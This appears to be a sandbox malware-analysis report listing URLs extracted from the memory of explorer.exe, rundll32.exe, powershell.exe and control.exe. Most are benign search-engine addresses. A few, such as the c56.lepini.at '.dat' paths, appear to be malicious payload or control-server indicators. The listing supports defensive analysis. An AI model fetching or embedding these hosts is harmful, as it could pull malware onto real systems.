          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmpString found in binary or memory: http://c56.lepini.at/e3
          Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp, explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
          Source: explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.datings
          Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmpString found in binary or memory: http://c56.lepini.at/l
          Source: explorer.exe, 00000024.00000000.487000468.00000000089C7000.00000004.00000001.sdmpString found in binary or memory: http://c56.lepini.at:80/jvassets/xI/t64.dat:
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: rundll32.exe, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: rundll32.exe, 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.488894525.000000000F540000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: rundll32.exe, 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: powershell.exe, 0000001C.00000002.509128308.000002218020E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: powershell.exe, 0000001C.00000002.508878039.0000022180001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 0000001C.00000002.509128308.000002218020E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
